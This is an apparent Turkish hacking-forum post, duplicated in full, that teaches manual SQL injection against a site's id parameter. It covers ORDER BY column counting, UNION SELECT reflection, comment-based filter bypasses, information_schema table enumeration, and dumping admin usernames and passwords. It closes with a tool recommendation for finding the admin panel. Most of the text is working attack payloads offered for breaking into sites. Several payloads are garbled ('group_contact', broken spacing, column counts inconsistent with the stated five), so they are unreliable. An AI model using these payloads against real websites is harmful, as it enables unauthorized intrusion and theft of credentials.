Manuel İle Sql İnjection Teşekkürü Cok Görmeyin
1-)İlk Önce Sitenin Kolon Sayısını Öğreneceğiz .
2-)Kolonları Yansıtacağız.
3-)Tablo İsimlerini Çekeceğiz.
4-)Tablolardan İstediğmizi Alacağız ( Şifre - Email - Kullanıcı Adı)
Ve Saldırmaya başlıyoruz ...
1 Kolon Sayısını Öğrenme Kavrama:
Site:örneksitemiz.com/index.php?id=9
Arkadaşlar Sitemizin Sonuna ''''' Ordes+by+sayı- ''''' Ayrıca "-" İşaretini Eklemeyi Unutmayın
Bunu Yapınca Böyle Bi Hata Gelirse:
Error:Unknown column 10 in order clause Benzer Bir Error Verirse
-- Kolon Sayısı 8'dan Küçük Tek Tek Aşağı İniyoruz .
>>order+by+8- , order+by+7-, order+by+6 , Site Eski Haline Gelene Kadar İniyoruz
>> order+by+5- " Sayfa Burda Eski Haline Dönmüşse Kolon Sayımız 5'Dir . "
2-)Kolonları Yansıtma
Arkadaşlar Burda +union+select+kolon Tek Tek Yazıyoruz. "- Sitenin Sonuna Yine Eklenecektir."
Şeklinde Olucak Kolon Sayımız Kaçsa O Kısma Kadar Yazacağız.
Şimdi Ekranı Sayılar Yansıyacak 8 ve 7 Yansıdı Diyelim. Bu Sayılardan Bir Tanesini Seçip İşimize Devam Edeceğiz.Eğer Sayılar Yansımazsa Bypass Gerekecek.
Bypass
1) Normal: +union +select+1,2,3,4,5,6,7,9
Bypass: +/*!union*/+/*!select*/+1,2,3,4,5,6,7,9
2) Normal:+union +select+1,2,3,4,5,6,7,9
Bypass: +union +(select+1,2,3,4,5,6,7,9)
3) Normal:+union +select+1,2,3,4,5,6,7,9
Bypass: +#union# +#select#+1,2,3,4,5,6,7,9
3-)Tablo İsimlerini Çekmek
-Yansıyan Sayıları ( 8 ve 7) Birini Seçiyoruz .
-8 Seçelim.
Kod:
A-)www.örneksitemiz.com/index.php?id=9+union+select+1,2,database(),3,4,5, 6,7,8,9-
Bu Komut Sayesinde Sitenin VeriTabanının Adını Öğrenmiş Oluyoruz
B-)www.örneksitemiz.com/index.php?id=9+union+select+1,2,version(),3,4,5,6 ,7,8,9-
Bu Komut Sayesinde Sitenin VeriTabanı Versiyonunu Öğreniyoruz.
C-)www.örneksitemiz.com/index.php?id=9+union+select+1,2,group_contact(tab le_name),4,5,6,7,8,9+from+information_sche ma.tables-
information_schema.tables = veritabanındaki tablo isimlerini gösterir
schema.tables yerini daha sonra şu komutu yazıyoruz.
information_schema.columns = veritabanındaki kolon isimlerini gösterir
-)www.örneksitemiz/index.php?id=9+union+select+1,2,group_concat(table_name),4,5,9+from+i nformation_schema.tables+where+tables_schema=database()
Bu kod sayesinde sadece hedef sitenin tablo isimlerini öğreniriz. Şimdi bu kodu gönderelim, gönderdikten sonra sitenin tablo isimleri ekrana yansıyacaktır. Örneğin yansıyan isimleri aşağıya yazalım.
Tablo İsimleri: admin,yerler,etkinlikler,yaptıklarımız
Bizim burada ilgileneceğimiz tablo ismi admin dir.
4-)Tablo İsimlerinden Veriyi Almak
-Adminin Verilerini Alacağız.
www.örneksitemiz.com/index.php?id=9+union+select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr om+information_schema.CoLumns+where+TabLeS_schema= database()+and+TabLe_Name=admin
Bu Kodu Gönderdikten Sonra Admin İçindeki Sütunlar Gelecektir. Gelen Sutünlar
ÖRN : user
passaword
e-mail
phone number
Bize Lazım Olanlar " User ve Passaword "
Şimdi Bize Lazım Olan Passaword ve User Sütunlarını Alalım
www.örneksite.com/index.php?id=9+union+select+1,2,group_concat(user,password),4,5,6,7,8+ from+admin
Kodunu Yazıp Sayfayı Yeniliyoruz.
Ve Ekrana User ve Passaword Bilgileri Yansıyacaktır.
Bilgileri Aldık Şimdi ( Admin Panelini ) Bulmamız Gerekecektir. (İntelli Tamper Programı Bu konuda İyidir Tavisye Ederim.)
not:Konunun Bazı Kısımları Alıntıdır
__________________
1-)İlk Önce Sitenin Kolon Sayısını Öğreneceğiz .
2-)Kolonları Yansıtacağız.
3-)Tablo İsimlerini Çekeceğiz.
4-)Tablolardan İstediğmizi Alacağız ( Şifre - Email - Kullanıcı Adı)
Ve Saldırmaya başlıyoruz ...
1 Kolon Sayısını Öğrenme Kavrama:
Site:örneksitemiz.com/index.php?id=9
Arkadaşlar Sitemizin Sonuna ''''' Ordes+by+sayı- ''''' Ayrıca "-" İşaretini Eklemeyi Unutmayın
Kod:
örneksitemiz.com/index.php?id=9+order+by+8-
Bunu Yapınca Böyle Bi Hata Gelirse:
Error:Unknown column 10 in order clause Benzer Bir Error Verirse
-- Kolon Sayısı 8'dan Küçük Tek Tek Aşağı İniyoruz .
>>order+by+8- , order+by+7-, order+by+6 , Site Eski Haline Gelene Kadar İniyoruz
>> order+by+5- " Sayfa Burda Eski Haline Dönmüşse Kolon Sayımız 5'Dir . "
2-)Kolonları Yansıtma
Arkadaşlar Burda +union+select+kolon Tek Tek Yazıyoruz. "- Sitenin Sonuna Yine Eklenecektir."
Kod:
www.örneksitemiz.com/index.php?id=9 URL Sonuna
Kod:
www.örneksitemiz.com/index.php?id=9+union+select+1+2+3+4+5+...8+9-
Şeklinde Olucak Kolon Sayımız Kaçsa O Kısma Kadar Yazacağız.
Şimdi Ekranı Sayılar Yansıyacak 8 ve 7 Yansıdı Diyelim. Bu Sayılardan Bir Tanesini Seçip İşimize Devam Edeceğiz.Eğer Sayılar Yansımazsa Bypass Gerekecek.
Bypass
1) Normal: +union +select+1,2,3,4,5,6,7,9
Bypass: +/*!union*/+/*!select*/+1,2,3,4,5,6,7,9
2) Normal:+union +select+1,2,3,4,5,6,7,9
Bypass: +union +(select+1,2,3,4,5,6,7,9)
3) Normal:+union +select+1,2,3,4,5,6,7,9
Bypass: +#union# +#select#+1,2,3,4,5,6,7,9
3-)Tablo İsimlerini Çekmek
-Yansıyan Sayıları ( 8 ve 7) Birini Seçiyoruz .
-8 Seçelim.
Kod:
A-)www.örneksitemiz.com/index.php?id=9+union+select+1,2,database(),3,4,5, 6,7,8,9-
Bu Komut Sayesinde Sitenin VeriTabanının Adını Öğrenmiş Oluyoruz
B-)www.örneksitemiz.com/index.php?id=9+union+select+1,2,version(),3,4,5,6 ,7,8,9-
Bu Komut Sayesinde Sitenin VeriTabanı Versiyonunu Öğreniyoruz.
C-)www.örneksitemiz.com/index.php?id=9+union+select+1,2,group_contact(tab le_name),4,5,6,7,8,9+from+information_sche ma.tables-
information_schema.tables = veritabanındaki tablo isimlerini gösterir
schema.tables yerini daha sonra şu komutu yazıyoruz.
information_schema.columns = veritabanındaki kolon isimlerini gösterir
-)www.örneksitemiz/index.php?id=9+union+select+1,2,group_concat(table_name),4,5,9+from+i nformation_schema.tables+where+tables_schema=database()
Bu kod sayesinde sadece hedef sitenin tablo isimlerini öğreniriz. Şimdi bu kodu gönderelim, gönderdikten sonra sitenin tablo isimleri ekrana yansıyacaktır. Örneğin yansıyan isimleri aşağıya yazalım.
Tablo İsimleri: admin,yerler,etkinlikler,yaptıklarımız
Bizim burada ilgileneceğimiz tablo ismi admin dir.
4-)Tablo İsimlerinden Veriyi Almak
-Adminin Verilerini Alacağız.
www.örneksitemiz.com/index.php?id=9+union+select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr om+information_schema.CoLumns+where+TabLeS_schema= database()+and+TabLe_Name=admin
Bu Kodu Gönderdikten Sonra Admin İçindeki Sütunlar Gelecektir. Gelen Sutünlar
ÖRN : user
passaword
phone number
Bize Lazım Olanlar " User ve Passaword "
Şimdi Bize Lazım Olan Passaword ve User Sütunlarını Alalım
www.örneksite.com/index.php?id=9+union+select+1,2,group_concat(user,password),4,5,6,7,8+ from+admin
Kodunu Yazıp Sayfayı Yeniliyoruz.
Ve Ekrana User ve Passaword Bilgileri Yansıyacaktır.
Bilgileri Aldık Şimdi ( Admin Panelini ) Bulmamız Gerekecektir. (İntelli Tamper Programı Bu konuda İyidir Tavisye Ederim.)
not:Konunun Bazı Kısımları Alıntıdır
__________________
Son düzenleme: